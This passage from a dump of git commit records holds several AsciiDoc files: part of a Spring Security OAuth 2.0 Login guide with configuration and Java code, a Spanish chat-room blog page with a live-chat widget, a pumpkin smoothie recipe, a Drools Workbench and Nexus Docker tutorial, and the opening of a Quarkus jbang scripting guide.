*${client-id}* and *${client-secret}* with the *client credentials* created in the previous section <<okta-login-register-application, Add Application>>.\nAs well, replace *${account-subdomain}* in _authorization-uri_, _token-uri_ and _user-info-uri_ with the *sub-domain* assigned to your account during the registration process.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.okta*.\n. At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[okta-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *Okta*.\n\nClick through on the Okta link and you'll be redirected to Okta for authentication.\n\nAfter you authenticate using your Okta credentials, the OAuth Client (application) will retrieve your email address and basic profile information from the http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#UserInfo[*UserInfo Endpoint*]\nand establish an _authenticated session_. The home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, name, email, profile, sub, etc.\n\n[[oauth2-login-auto-configuration]]\n== OAuth 2.0 Login auto-configuration\n\nAs you worked through this guide and setup OAuth 2.0 Login with one of the Providers,\nwe hope you noticed the ease in configuration and setup required in getting the sample up and running?\nAnd you may be asking, how does this all work? Thanks to some Spring Boot auto-configuration _magic_,\nwe were able to automatically register the OAuth Client(s) configured in the `Environment`,\nas well, provide a minimal security configuration for OAuth 2.0 Login.\n\nThe following provides an overview of the Spring Boot auto-configuration classes:\n\n[[client-registration-auto-configuration-class]]\n*_org.springframework.boot.autoconfigure.security.oauth2.client.ClientRegistrationAutoConfiguration_*::\n`ClientRegistrationAutoConfiguration` is responsible for registering a `ClientRegistrationRepository` _bean_ with the `ApplicationContext`.\nThe `ClientRegistrationRepository` is composed of one or more `ClientRegistration` instances, which are created from the OAuth client properties\nconfigured in the `Environment` that are prefixed with `security.oauth2.client.[client-key]`, for example, `security.oauth2.client.google`.\n\nNOTE: `ClientRegistrationAutoConfiguration` also loads a _resource_ named *oauth2-clients-defaults.yml*,\n which provides a set of default client property values for a number of _well-known_ Providers.\n More on this in the later section <<oauth2-default-client-properties, Default client property values>>.\n\n[[oauth2-login-auto-configuration-class]]\n*_org.springframework.boot.autoconfigure.security.oauth2.client.OAuth2LoginAutoConfiguration_*::\n`OAuth2LoginAutoConfiguration` is responsible for enabling OAuth 2.0 Login,\nonly if there is a `ClientRegistrationRepository` _bean_ available in the `ApplicationContext`.\n\nWARNING: The auto-configuration classes (and dependent resources) will eventually _live_ in the *Spring Boot Security Starter*.\n\n[[oauth2-client-properties]]\n=== OAuth client properties\n\nThe following specifies the common set of properties available for configuring an OAuth Client.\n\n[TIP]\n====\n- *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n- Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.google*.\n- At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n====\n\n- *client-authentication-method* - the method used to authenticate the _Client_ with the _Provider_. Supported values are *header* and *form*.\n- *authorized-grant-type* - the OAuth 2.0 Authorization Framework defines the https:\/\/tools.ietf.org\/html\/rfc6749#section-1.3.1[Authorization Code] grant type,\n which is used to realize the _\"authentication flow\"_. Currently, this is the only supported grant type.\n- *redirect-uri* - this is the client's _registered_ redirect URI that the _Authorization Server_ redirects the end-user's user-agent\n to after the end-user has authenticated and authorized access for the client.\n\nNOTE: The default redirect URI is _\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_, which leverages *URI template variables*.\n\n- *scopes* - a comma-delimited string of scope(s) requested during the _Authorization Request_ flow, for example: _openid, email, profile_\n\nNOTE: _OpenID Connect 1.0_ defines these http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#ScopeClaims[standard scopes]: _profile, email, address, phone_\n\nNOTE: Non-standard scopes may be defined by a standard _OAuth 2.0 Provider_. Please consult the Provider's OAuth API documentation to learn which scopes are supported.\n\n- *authorization-uri* - the URI used by the client to redirect the end-user's user-agent to the _Authorization Server_ in order to obtain authorization from the end-user (the _Resource Owner_).\n- *token-uri* - the URI used by the client when exchanging an _Authorization Grant_ (for example, Authorization Code) for an _Access Token_ at the _Authorization Server_.\n- *user-info-uri* - the URI used by the client to access the protected resource *UserInfo Endpoint*, in order to obtain attributes of the end-user.\n- *user-info-converter* - the `Converter` implementation class used to convert the *UserInfo Response* to a `UserInfo` (_OpenID Connect 1.0 Provider_) or `OAuth2User` instance (_Standard OAuth 2.0 Provider_).\n\nTIP: The `Converter` implementation class for an _OpenID Connect 1.0 Provider_ is *org.springframework.security.oauth2.client.user.converter.UserInfoConverter*\n and for a standard _OAuth 2.0 Provider_ it's *org.springframework.security.oauth2.client.user.converter.OAuth2UserConverter*.\n\n- *user-info-name-attribute-key* - the _key_ used to retrieve the *Name* of the end-user from the `Map` of available attributes in `UserInfo` or `OAuth2User`.\n\nNOTE: _OpenID Connect 1.0_ defines the http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[*\"name\"* Claim], which is the end-user's full name and is the default used for `UserInfo`.\n\nIMPORTANT: Standard _OAuth 2.0 Provider's_ may vary the naming of their *Name* attribute. Please consult the Provider's *UserInfo* API documentation.\n This is a *_required_* property when *user-info-converter* is set to `OAuth2UserConverter`.\n\n- *client-name* - this is a descriptive name used for the client. The name may be used in certain scenarios, for example, when displaying the name of the client in the _auto-generated login page_.\n- *client-alias* - an _alias_ which uniquely identifies the client. It *must be* unique within a `ClientRegistrationRepository`.\n\n[[oauth2-default-client-properties]]\n=== Default client property values\n\nAs noted previously, <<client-registration-auto-configuration-class, `ClientRegistrationAutoConfiguration`>> loads a _resource_ named *oauth2-clients-defaults.yml*,\nwhich provides a set of default client property values for a number of _well-known_ Providers.\n\nFor example, the *authorization-uri*, *token-uri*, *user-info-uri* rarely change for a Provider and therefore it makes sense to\nprovide a set of defaults in order to reduce the configuration required by the user.\n\nBelow are the current set of default client property values:\n\n.oauth2-clients-defaults.yml\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n google:\n client-authentication-method: header\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: openid, email, profile\n authorization-uri: \"https:\/\/accounts.google.com\/o\/oauth2\/auth\"\n token-uri: \"https:\/\/accounts.google.com\/o\/oauth2\/token\"\n user-info-uri: \"https:\/\/www.googleapis.com\/oauth2\/v3\/userinfo\"\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.UserInfoConverter\"\n client-name: Google\n client-alias: google\n github:\n client-authentication-method: header\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: user\n authorization-uri: \"https:\/\/github.com\/login\/oauth\/authorize\"\n token-uri: \"https:\/\/github.com\/login\/oauth\/access_token\"\n user-info-uri: \"https:\/\/api.github.com\/user\"\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.OAuth2UserConverter\"\n client-name: GitHub\n client-alias: github\n facebook:\n client-authentication-method: form\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: public_profile, email\n authorization-uri: \"https:\/\/www.facebook.com\/v2.8\/dialog\/oauth\"\n token-uri: \"https:\/\/graph.facebook.com\/v2.8\/oauth\/access_token\"\n user-info-uri: \"https:\/\/graph.facebook.com\/me\"\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.OAuth2UserConverter\"\n client-name: Facebook\n client-alias: facebook\n okta:\n client-authentication-method: header\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: openid, email, profile\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.UserInfoConverter\"\n client-name: Okta\n client-alias: okta\n----\n\n= Appendix\n'''\n\n[[configure-non-spring-boot-app]]\n== Configuring a _Non-Spring-Boot_ application\n\nIf you are not using Spring Boot for your application, you will not be able to leverage the auto-configuration features for OAuth 2.0 Login.\nYou will be required to provide your own _security configuration_ in order to enable OAuth 2.0 Login.\n\nThe following sample code demonstrates a minimal security configuration for enabling OAuth 2.0 Login.\n\nLet's assume we have a _properties file_ named *oauth2-clients.properties* on the _classpath_ and it specifies all the _required_ properties for an OAuth Client, specifically _Google_.\n\n.oauth2-clients.properties\n[source,properties]\n----\nsecurity.oauth2.client.google.client-id=${client-id}\nsecurity.oauth2.client.google.client-secret=${client-secret}\nsecurity.oauth2.client.google.client-authentication-method=header\nsecurity.oauth2.client.google.authorized-grant-type=authorization_code\nsecurity.oauth2.client.google.redirect-uri=http:\/\/localhost:8080\/oauth2\/authorize\/code\/google\nsecurity.oauth2.client.google.scopes=openid,email,profile\nsecurity.oauth2.client.google.authorization-uri=https:\/\/accounts.google.com\/o\/oauth2\/auth\nsecurity.oauth2.client.google.token-uri=https:\/\/accounts.google.com\/o\/oauth2\/token\nsecurity.oauth2.client.google.user-info-uri=https:\/\/www.googleapis.com\/oauth2\/v3\/userinfo\nsecurity.oauth2.client.google.user-info-converter=org.springframework.security.oauth2.client.user.converter.UserInfoConverter\nsecurity.oauth2.client.google.client-name=Google\nsecurity.oauth2.client.google.client-alias=google\n----\n\nThe following _security configuration_ will enable OAuth 2.0 Login using _Google_ as the _Authentication Provider_:\n\n[source,java]\n----\n@EnableWebSecurity\n@PropertySource(\"classpath:oauth2-clients.properties\")\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n\tprivate Environment environment;\n\n\tpublic SecurityConfig(Environment environment) {\n\t\tthis.environment = environment;\n\t}\n\n\t@Override\n\tprotected void configure(HttpSecurity http) throws Exception {\n http\n .authorizeRequests()\n .anyRequest().authenticated()\n .and()\n .oauth2Login()\n .clients(clientRegistrationRepository())\n .userInfoEndpoint()\n .userInfoTypeConverter(\n new UserInfoConverter(),\n new URI(\"https:\/\/www.googleapis.com\/oauth2\/v3\/userinfo\"));\n\t}\n\n\t@Bean\n\tpublic ClientRegistrationRepository clientRegistrationRepository() {\n\t\tList<ClientRegistration> clientRegistrations = Collections.singletonList(\n\t\t\tclientRegistration(\"security.oauth2.client.google.\"));\n\n\t\treturn new InMemoryClientRegistrationRepository(clientRegistrations);\n\t}\n\n\tprivate ClientRegistration clientRegistration(String clientPropertyKey) {\n\t\tString clientId = this.environment.getProperty(clientPropertyKey + \"client-id\");\n\t\tString clientSecret = this.environment.getProperty(clientPropertyKey + \"client-secret\");\n\t\tClientAuthenticationMethod clientAuthenticationMethod = ClientAuthenticationMethod.valueOf(\n\t\t\tthis.environment.getProperty(clientPropertyKey + \"client-authentication-method\").toUpperCase());\n\t\tAuthorizationGrantType authorizationGrantType = AuthorizationGrantType.valueOf(\n\t\t\tthis.environment.getProperty(clientPropertyKey + \"authorized-grant-type\").toUpperCase());\n\t\tString redirectUri = this.environment.getProperty(clientPropertyKey + \"redirect-uri\");\n\t\tString[] scopes = this.environment.getProperty(clientPropertyKey + \"scopes\").split(\",\");\n\t\tString authorizationUri = this.environment.getProperty(clientPropertyKey + \"authorization-uri\");\n\t\tString tokenUri = this.environment.getProperty(clientPropertyKey + \"token-uri\");\n\t\tString userInfoUri = this.environment.getProperty(clientPropertyKey + \"user-info-uri\");\n\t\tString clientName = this.environment.getProperty(clientPropertyKey + \"client-name\");\n\t\tString clientAlias = this.environment.getProperty(clientPropertyKey + \"client-alias\");\n\n\t\treturn new ClientRegistration.Builder(clientId)\n\t\t\t.clientSecret(clientSecret)\n\t\t\t.clientAuthenticationMethod(clientAuthenticationMethod)\n\t\t\t.authorizedGrantType(authorizationGrantType)\n\t\t\t.redirectUri(redirectUri)\n\t\t\t.scopes(scopes)\n\t\t\t.authorizationUri(authorizationUri)\n\t\t\t.tokenUri(tokenUri)\n\t\t\t.userInfoUri(userInfoUri)\n\t\t\t.clientName(clientName)\n\t\t\t.clientAlias(clientAlias)\n\t\t\t.build();\n\t}\n}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"48f16ce2fe3cdd93da83fe321ff81b2abc00ac1c","subject":"Update 2016-08-25-Sala-de-Chat-Privado.adoc","message":"Update 2016-08-25-Sala-de-Chat-Privado.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2016-08-25-Sala-de-Chat-Privado.adoc","new_file":"_posts\/2016-08-25-Sala-de-Chat-Privado.adoc","new_contents":"= Sala de Chat Privado\n:hp-tags: Chat,\n\n== Entra en esta sala si quieres chatear en privado. \n\nPara chatear lanza el chat buscando en la p\u00e1gina la imagen flotante similar a esta:\n\n\/\/image::https:\/\/livechatbot.net\/images\/pic01.png[]\n\/\/image::http:\/\/github.com\/txemis\/txemis.github.io\/images\/pic01.png[]\n\/\/image::http:\/\/github.com\/txemis\/txemis.github.io\/images\/livechat.jpg[]\n\/\/image::https:\/\/github.com\/txemis\/txemis.github.io\/blob\/master\/images\/livechat.png[]..\n\nimage::livechat.jpg[]\n\n++++\n<script id=\"TelegramLiveChatLoader\" data-bot=\"F7EDD3EE-4BF6-11E6-972D-C7C0FDD63063\" src=\"\/\/livechatbot.net\/assets\/chat\/js\/loader.js\"><\/script>\n++++","old_contents":"= Sala de Chat Privado\n:hp-tags: Chat,\n\n== Entra en esta sala si quieres chatear en privado\n\nPara chatear lanza el chat buscando en la p\u00e1gina la imagen flotante similar a esta:\n\n\/\/image::https:\/\/livechatbot.net\/images\/pic01.png[]\n\/\/image::http:\/\/github.com\/txemis\/txemis.github.io\/images\/pic01.png[]\n\/\/image::http:\/\/github.com\/txemis\/txemis.github.io\/images\/livechat.jpg[]\n\/\/image::https:\/\/github.com\/txemis\/txemis.github.io\/blob\/master\/images\/livechat.png[]..\n\nimage::livechat.jpg[]\n\n++++\n<script id=\"TelegramLiveChatLoader\" data-bot=\"F7EDD3EE-4BF6-11E6-972D-C7C0FDD63063\" src=\"\/\/livechatbot.net\/assets\/chat\/js\/loader.js\"><\/script>\n++++","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e5125f8aaff240f2c55fb340e6ce2614604e1ecc","subject":"Update 2016-09-24-Pumpkin-Smoothie-Jar.adoc","message":"Update 2016-09-24-Pumpkin-Smoothie-Jar.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-09-24-Pumpkin-Smoothie-Jar.adoc","new_file":"_posts\/2016-09-24-Pumpkin-Smoothie-Jar.adoc","new_contents":"= Pumpkin Smoothie Jar\n\n:hp-tags: [vegan, pumpkin, smoothie, fall, breakfast]\n\nSince fall is here I decided to bake three different pumpkin recipies! Here is the first one: Pumpkin Smoothie Jar.\n\nThis is a really easy breakfast to make. It smells so good, it'll make you want to curl up with a good book and a hot cup of coffee by the fire while you slowly enjoy every bite.\n\nimage::final_shot.jpg[Pumpkin Jar]\n\n*Pumpkin Smoothie*\n\nThe first step to making a pumpkin smoothie jar is to make the smoothie. For this recipe, I used the pumpkin pur\u00e9e that I make myself, but you can definitely use store bought pumpkin pur\u00e9e. Scroll down to view the simple recipe to make your very own pumpkin pur\u00e9e\n\nimage::puree.jpg[Pumpkin Pur\u00e9e]\n\n+++<u>Ingredients<\/u>+++\n[square]\n* 2 medjool dates\n* 130 g pumpkin pur\u00e9e\n* 160 ml almond milk (unsweetened)\n* 0.5 g nutmeg\n* 0.5 g all spice\n* 1.5 g cinnamon\n\n+++<u>Instructions<\/u>+++\n[square]\n. Put all the ingredients in a blender and blend until smoothe.\n\n\n*Pumpkin Smoothie Jar*\n\n+++<u>Ingredients<\/u>+++\n[square]\n* pumpkin smoothie\n* 30 g chia seeds\n* 70 g vegan granola of your choice\n* 80 g yogurt of your choice\n* 20 g pumpkin seeds\n\n+++<u>Instructions<\/u>+++\n[square]\n. Arrange in a bowl or jar in an aesthetically pleasing way :)\n. Add fruits or other nuts according to your cravings today!\n\nYou're done! You can also just drink the smoothie on it's own. I would suggest simply adding a bit more almond milk to thin it out a bit.\n\nimage::jar_top.jpg[Pumpkin Jar top view]\nimage::hand_jar.jpg[Pumpkin Jar]\n\n---\n\n*Pumpkin Pur\u00e9e*\n\nYou can either buy pumpkin pur\u00e9e in a can or make your own. I prefer to make my own, it's pretty simple, all you need is a small pumpkin. Pro tip: make it the night before you want to make your favourite pumpkin recipe.\n\nimage::pumpkin_slices.jpg[Pumpkin Slices]\n\n+++<u>Ingredients<\/u>+++\n[square]\n* 1 small pumpkin\n\n+++<u>Instructions<\/u>+++\n[square]\n. Set the oven to 190 C.\n. Cut the pumpkin in half with a sharp knife and empty our the guts. Keep the seeds and rince them if you want to roast them later.\n. Cut the pumpkin halves lengthwise into six slices. \n. Arrange the pumpkin slices outter skin down on a baking pan, no oil is needed.\n. Bake the pumpkin for one hour, or until you can easily poke a fork through the skin.\n. Once ready, take out of the even and let it cool.\n. After it has cooled down, use you hands to peel the outer skin off the pulp.\n. Put the pulp into a food processor and pur\u00e9e (or mash with a for or potato masher).\n\nVoil\u00e0! Keep your pur\u00e9e in the fridge for up to a week or freeze some for later use.\n","old_contents":"= Pumpkin Smoothie Jar\n\n:hp-tags: [vegan, pumpkin, smoothie, breakfast]\n\nThis month I decided to bake three different recipies made with pumpkin! Here is the first one.\n\n*Pumpkin Pur\u00e9e*\n\nFirst off, make the pumpkin pur\u00e9e with a small pumpkin. I usually make this the night before I want to make a pumpkin recipe.\n\n+++<u>Ingredients<\/u>+++\n[square]\n* 1 small pumpkin\n\n+++<u>Instructions<\/u>+++\n[square]\n* Set the oven to 190C.\n* Cut the pumpkin in half with a sharp knife and empty our the guts. Keep the seeds and rince them if you want to roast them later.\n* Cut the pumpkin halves lengthwise into six slices. \n* Arrange the pumpkin slices outter skin down on a baking pan, no oil is needed.\n* Bake the pumpkin for one hour, or until you can easily poke a fork through the skin.\n* Once ready, take out of the even and let it cool.\n* After it has cooled down, use you hands to peel the outer skin off the pulp.\n* Put the pulp into a food processor and pur\u00e9e (or mash with a for or potato masher).\n\nVoil\u00e0! Keep your pur\u00e9e in the fridge for up to a week or freeze some for later use.\n\n\nNow for the smoothie!\n\nThis is a really easy breakfast to make. It smells so good, it'll make you want to curl up with a good book and a hot cup of coffee by the fire while you slowly enjoy every bite.\n\n*Pumpkin Smoothie*\n\n+++<u>Ingredients<\/u>+++\n[square]\n* 2 medjool dates\n* 130 g pumpkin pur\u00e9e\n* 160 ml almond milk (unsweetened)\n* 0.5 g nutmeg\n* 0.5 g all spice\n* 1.5 g cinnamon\n\n+++<u>Instructions<\/u>+++\n[square]\n* Put all the ingredients in a blender and mix under smoothe\n\n*Pumpkin Smoothie Jar*\n\n+++<u>Ingredients<\/u>+++\n[square]\n* pumpkin smoothie\n* 30 g chia seeds\n* 70 g vegan granola of your choice\n* 80 g yogurt of your choice\n* 20 g pumpkin seeds\n\n+++<u>Instructions<\/u>+++\n[square]\n* Arrange in a bowl or jar in an aesthetically pleasing way :)\n* Add fruits or other nuts according to your cravings today!\n\nYou're done!\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"5a67185b8e3ab38a6910b74c93c30eddcd0ac6e9","subject":"Update 2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","message":"Update 2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","repos":"ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog","old_file":"_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","new_file":"_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","new_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n:hp-tags: Docker, Drools Workbench, Kie Workbench, Nexus, maven\n\/\/ :hp-alt-title: My English Title\n= Drools workbench and Nexus with Docker.\n\nThis tutorial will help you to setup drools workbench ui to publish artifacts to a custom nexus repository particularly if you are using both these services in docker containers.\n\n== Step 1: Setup Nexus docker container\n \n $ docker pull sonatype\/nexus\n $ docker run -d -p 8081:8081 --name nexus sonatype\/nexus:oss\n \nVerify that the container is up and running.\nNote the ip address of the container.\n\n== Step 2: Modify Drools-workbench dockerfile to include maven settings.xml in the container.\n \n $ git clone https:\/\/github.com\/jboss-dockerfiles\/drools.git\n $ cd drools\/drools-wb\/showcase\/etc\/\n $ nano settings.xml\n <settings>\n <localRepository>${env.HOME}\/.m2\/repository<\/localRepository>\n <servers>\n <server>\n <id>workbench<\/id> <!-- Specify this in project pom -->\n <username>deployment<\/username>\n <password>deployment123<\/password>\n <configuration>\n <wagonProvider>httpclient<\/wagonProvider>\n <httpConfiguration>\n <all>\n <usePreemptive>true<\/usePreemptive>\n <\/all>\n <\/httpConfiguration>\n <\/configuration>\n <\/server>\n <\/servers>\n <\/settings>\n\n $ cd ..\n $ nano Dockerfile\n \nAdd this line in Drools Workbench Custom Configuration section\n\n RUN mkdir -p $HOME\/.m2\n ADD etc\/settings.xml $JBOSS_HOME\/..\/.m2\/settings.xml\n\nAdd this line in Added files are chowned.. Section\n\n && \\\nchown jboss:jboss $JBOSS_HOME\/..\/.m2\/settings.xml\n\nSave and close\n\n $ .\/build.sh\n \n== Step3 : Run the drools-workbench docker container\n \n $ docker run -p 8080:8080 -p 8001:8001 -d --name drools-workbench jboss\/drools-workbench-showcase:latest ( or your own tag )\n\n== Step 4: Create a project in the drools workbench ui\nGot to *localhost:8080\/drools-wb*\t+\nLogin using admin:admin\t+\nGo to *Authoring>Project Authoring* and create a project.\t+\nGo to the *Authoring>Administration>Repositories* and add the following to the pom.xml\n\n <distributionManagement>\n\t <repository>\n \t<id>workbench<\/id>\n <name>Workbench<\/name>\n <url>http:\/\/nexus_ip:8081\/nexus\/content\/repositories\/releases\/<\/url>\n <\/repository>\n <snapshotRepository>\n \t<id>workbench-snapshot<\/id>\n <name>Workbench Snapshot<\/name>\n <url>http:\/\/nexus_ip:8081\/nexus\/content\/repositories\/snapshots\/<\/url>\n <\/snapshotRepository>\n <\/distributionManagement>\n\n== Step 5: Build and Deploy\nGo to *Authoring>Project Authoring* and select your project.\t+\nClick on *Build and Deploy* button on the top right.\t+\nYour artifacts should be published to the configured nexus.\n\n\n\n\n== For Non docker ( Standalone ) :\nModify ~\/.m2\/settings.xml to include the lines shown in step 2.\t+\nAnd also follow step 4.","old_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n= Drools workbench and Nexus with Docker.\nThis tutorial will help you to setup drools workbench ui to publish artifacts to a custom nexus repository particularly if you are using both these services in docker containers.\n\n== Step 1: Setup Nexus docker container\n \n $ docker pull sonatype\/nexus\n $ docker run -d -p 8081:8081 --name nexus sonatype\/nexus:oss\n \nVerify that the container is up and running.\nNote the ip address of the container.\n\n== Step 2: Modify Drools-workbench dockerfile to include maven settings.xml in the container.\n \n $ git clone https:\/\/github.com\/jboss-dockerfiles\/drools.git\n $ cd drools\/drools-wb\/showcase\/etc\/\n $ nano settings.xml\n <settings>\n <localRepository>${env.HOME}\/.m2\/repository<\/localRepository>\n <servers>\n <server>\n <id>workbench<\/id> <!-- Specify this in project pom -->\n <username>deployment<\/username>\n <password>deployment123<\/password>\n <configuration>\n <wagonProvider>httpclient<\/wagonProvider>\n <httpConfiguration>\n <all>\n <usePreemptive>true<\/usePreemptive>\n <\/all>\n <\/httpConfiguration>\n <\/configuration>\n <\/server>\n <\/servers>\n <\/settings>\n\n $ cd ..\n $ nano Dockerfile\n \nAdd this line in Drools Workbench Custom Configuration section\n\n RUN mkdir -p $HOME\/.m2\n ADD etc\/settings.xml $JBOSS_HOME\/..\/.m2\/settings.xml\n\nAdd this line in Added files are chowned.. Section\n\n && \\\nchown jboss:jboss $JBOSS_HOME\/..\/.m2\/settings.xml\n\nSave and close\n\n $ .\/build.sh\n \n== Step3 : Run the drools-workbench docker container\n \n $ docker run -p 8080:8080 -p 8001:8001 -d --name drools-workbench jboss\/drools-workbench-showcase:latest ( or your own tag )\n\n== Step 4: Create a project in the drools workbench ui\nGot to *localhost:8080\/drools-wb*\t+\nLogin using admin:admin\t+\nGo to *Authoring>Project Authoring* and create a project.\t+\nGo to the *Authoring>Administration>Repositories* and add the following to the pom.xml\n\n <distributionManagement>\n\t <repository>\n \t<id>workbench<\/id>\n <name>Workbench<\/name>\n <url>http:\/\/nexus_ip:8081\/nexus\/content\/repositories\/releases\/<\/url>\n <\/repository>\n <snapshotRepository>\n \t<id>workbench-snapshot<\/id>\n <name>Workbench Snapshot<\/name>\n <url>http:\/\/nexus_ip:8081\/nexus\/content\/repositories\/snapshots\/<\/url>\n <\/snapshotRepository>\n <\/distributionManagement>\n\n== Step 5: Build and Deploy\nGo to *Authoring>Project Authoring* and select your project.\t+\nClick on *Build and Deploy* button on the top right.\t+\nYour artifacts should be published to the configured nexus.\n\n\n\n\n== For Non docker ( Standalone ) :\nModify ~\/.m2\/settings.xml to include the lines shown in step 2.\t+\nAnd also follow step 4.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"761eb5a2fedaaca478c42a4272e7a7ff72ff9beb","subject":"Update 2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","message":"Update 2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","new_file":"_posts\/2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"fe64130a2725f682b522f36cd084705cb19d0b6a","subject":"Proofread Scripting with jbang guide","message":"Proofread Scripting with jbang guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/scripting.adoc","new_file":"docs\/src\/main\/asciidoc\/scripting.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Scripting with Quarkus\n:extension-status: preview\n\nQuarkus provides integration with https:\/\/jbang.dev[jbang] which allows you to write Java scripts\/applications requiring no Maven nor Gradle to get running.\n\nIn this guide, we will see how you can write a REST application using just a single Java file.\n\ninclude::.\/status-include.adoc[]\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 5 minutes\n* https:\/\/jbang.dev\/download[jbang v0.40.3+]\n* an IDE\n* GraalVM installed if you want to run in native mode\n\n== Solution\n\nNormally we would link to a Git repository to clone but in this case there is no additional files than the following:\n\n[source,java,subs=attributes+]\n----\n\/\/usr\/bin\/env jbang \"$0\" \"$@\" ; exit $?\n\/\/DEPS io.quarkus:quarkus-resteasy:999-SNAPSHOT\n\/\/JAVAC_OPTIONS -parameters\n\/\/JAVA_OPTIONS -Djava.util.logging.manager=org.jboss.logmanager.LogManager\n\nimport io.quarkus.runtime.Quarkus;\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\nimport org.jboss.resteasy.annotations.jaxrs.PathParam;\nimport org.jboss.logging.Logger;\n\n@Path(\"\/hello\")\n@ApplicationScoped\npublic class quarkusapp {\n\n @GET\n public String sayHello() {\n return \"hello\";\n }\n\n public static void main(String[] args) {\n Quarkus.run(args);\n }\n\n @Inject\n GreetingService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n @Path(\"\/greeting\/{name}\")\n public String greeting(@PathParam String name) {\n return service.greeting(name);\n }\n\n @ApplicationScoped\n static public class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n }\n}\n----\n\n== Architecture\n\nIn this guide, we create a straightforward application serving a `hello` endpoint with a single source file, no additional build files like `pom.xml` or `build.gradle` needed. To demonstrate dependency injection, this endpoint uses a `greeting` bean.\n\nimage::getting-started-architecture.png[alt=Architecture]\n\n== Creating the initial file\n\nFirst, we need a Java file. jbang lets you create an initial version using:\n\n[source,shell,subs=attributes+]\n----\njbang scripting\/quarkusapp.java\ncd scripting\n----\n\nThis command generates a .java file that you can directly run on Linux and macOS, i.e. `.\/quarkusapp.java` - on Windows you need to use `jbang quarkusapp.java`.\n\nThis initial version will print `Hello World` when run.\n\nOnce generated, look at the `quarkusapp.java`.\n\nYou will find at the top a line looking like this:\n\n[source,java]\n----\n\/\/usr\/bin\/env jbang \"$0\" \"$@\" ; exit $?\n----\n\nThis line is what on Linux and macOS allows you to run it as a script. On Windows this line is ignored.\n\nThe next line\n\n[source,java]\n----\n\/\/ \/\/DEPS 